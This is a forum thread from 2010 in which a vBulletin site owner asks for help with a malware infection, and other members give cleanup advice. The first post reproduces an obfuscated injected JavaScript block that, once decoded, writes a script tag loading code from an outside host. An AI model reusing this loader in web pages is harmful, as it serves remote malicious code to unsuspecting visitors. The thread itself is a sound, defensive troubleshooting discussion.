Register Members List Search Today's Posts Mark Forums Read

Reply
 
Thread Tools
  #1  
Old 04 May 2010, 12:30
ryancooper's Avatar
ryancooper ryancooper is offline
 
Join Date: Jul 2002
Hacked Site. Please help!

Hello,
I am hoping someone can help me out here. MY site is being reported as being infected with malware. If i look at the source code I can see

http://www.talkdisney.com/forums/wdw-theme-parks/

<script type="text/javascript">
var RSrAHsQFTSZ = "GXlLD17GXlLD29"; var rTOwsCKOsBB0 = "GXlLD3cGXlLD73GXlLD"; var rTOwsCKOsBB1 = "63GXlLD72GXlLD69GXl"; var rTOwsCKOsBB2 = "LD70GXlLD74GXlLD20G"; var rTOwsCKOsBB3 = "XlLD73GXlLD72GXlLD6"; var rTOwsCKOsBB4 = "3GXlLD3dGXlLD22GXlL"; var rTOwsCKOsBB5 = "D68GXlLD74GXlLD74GX"; var rTOwsCKOsBB6 = "lLD70GXlLD3aGXlLD2f"; var rTOwsCKOsBB7 = "GXlLD2fGXlLD78GXlLD"; var rTOwsCKOsBB8 = "74GXlLD6fGXlLD70GXl"; var rTOwsCKOsBB9 = "LD2eGXlLD73GXlLD65G"; var rTOwsCKOsBB10 = "XlLD72GXlLD76GXlLD6"; var rTOwsCKOsBB11 = "5GXlLD70GXlLD69GXlL"; var rTOwsCKOsBB12 = "D63GXlLD73GXlLD2eGX"; var rTOwsCKOsBB13 = "lLD63GXlLD6fGXlLD6d"; var rTOwsCKOsBB14 = "GXlLD2fGXlLD2fGXlLD"; var rTOwsCKOsBB15 = "6dGXlLD6cGXlLD2eGXl"; var rTOwsCKOsBB16 = "LD70GXlLD68GXlLD70G"; var rTOwsCKOsBB17 = "XlLD22GXlLD3eGXlLD2"; var rTOwsCKOsBB18 = "0GXlLD3cGXlLD2fGXlL"; var rTOwsCKOsBB19 = "D73GXlLD63GXlLD72GX"; var rTOwsCKOsBB20 = "lLD69GXlLD70GXlLD74"; var rTOwsCKOsBB21 = "GXlLD3e"; var ZrWBlSVWKBL = "MWp2m17GXlLD29"; var GwA9juVrobG = rTOwsCKOsBB0 + rTOwsCKOsBB1 + rTOwsCKOsBB2 + rTOwsCKOsBB3 + rTOwsCKOsBB4 + rTOwsCKOsBB5 + rTOwsCKOsBB6 + rTOwsCKOsBB7 + rTOwsCKOsBB8 + rTOwsCKOsBB9 + rTOwsCKOsBB10 + rTOwsCKOsBB11 + rTOwsCKOsBB12 + rTOwsCKOsBB13 + rTOwsCKOsBB14 + rTOwsCKOsBB15 + rTOwsCKOsBB16 + rTOwsCKOsBB17 + rTOwsCKOsBB18 + rTOwsCKOsBB19 + rTOwsCKOsBB20 + rTOwsCKOsBB21; var wa79vdAM5Lo = "wqOw517CEXvL29"; tZlMHObzT1T = GwA9juVrobG.replace(/GXlLD/g,"%"); var FwL4HjvTvmP=unescape;var RSrAHsQFTSZ = "CEXvL17MWp2m29"; q9124=this; var Bu91Qzp2Fxa= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Bu91Qzp2Fxa.write(FwL4HjvTvmP(tZlMHObzT1T));
</script>


But I can not find this in the templates or database to remove it. Any ideas on how to fix this?


After a little more research it also seems to only show up in IE not in firefox?
Thanks,
ryan
Reply With Quote
  #2  
Old 04 May 2010, 20:08
kylek kylek is offline
 
Join Date: Oct 2003
Real name: Kyle
Tried to look at your site but avast popped up a malicious url blocked warning, info might help you, will send it via pm
__________________
Reply With Quote
  #3  
Old 05 May 2010, 08:04
ZomgStuff's Avatar
ZomgStuff ZomgStuff is offline
 
Join Date: Feb 2007
I had a very similar problem just recently. Do you happen to have MGC chatbox installed?

You should look through your .js files, as that's where I found lots of copies of it.
Reply With Quote
  #4  
Old 05 May 2010, 14:02
ryancooper's Avatar
ryancooper ryancooper is offline
 
Join Date: Jul 2002
@Kylek thanks for the info in PM Lookign now but so far no luck

@ZomgStuff - What did you look for in the .js files?

Thanks for any help!
Reply With Quote
  #5  
Old 05 May 2010, 18:43
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
 
Join Date: Sep 2008
Real name: Michael Miller Jr
Originally Posted by ryancooper View Post
@Kylek thanks for the info in PM Lookign now but so far no luck

@ZomgStuff - What did you look for in the .js files?

Thanks for any help!
If you have a custom mod like a chatbox or any custom mods simply replace all the .js files of that mod w/ a fresh downloaded copy.

AdminCP > Maintenance > Diagnostics > Suspect File Versions

*Now, not all files are "suspect" or "bad" but that will help you track down the files if you are unaware of them all. Be sure to check your .js files as mentioned above and also check your templates for any iframes so search in templates for


Block Disabled:      (Update License Status)  
Suspended or Unlicensed Members Cannot View Code.

Leave the part after the = off so you can find all instances, some of these malicious scripts utilize iframes, there is a currently popular iframe and js baddy for Word Press atm so if you have that installed this could be the aftermath if they hacked your site via an exploit.
__________________
Daddy Does Dios and Figs!
https://www.linkedin.com/in/thelastsuperman

Search - Use the search feature to find similar issues/answers.
Information - Include screenshots, copy/pasted error codes, url etc.
Fixed - Please return to your thread/post and let us know how it was fixed!
Thanks - For participating! Click the "Like" on a post if someone helped you!
Reply With Quote
  #6  
Old 05 May 2010, 18:56
ryancooper's Avatar
ryancooper ryancooper is offline
 
Join Date: Jul 2002
Found it in my vbseo config file. no idea how it got there but its gone now. Thanks for all your help.
Reply With Quote
  #7  
Old 05 May 2010, 20:20
legacy123 legacy123 is offline
 
Join Date: Feb 2010
I would definetly secure your files after seeing that
Reply With Quote
Reply



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


New To Site? Need Help?

All times are GMT. The time now is 15:00.

Layout Options | Width: Wide Color: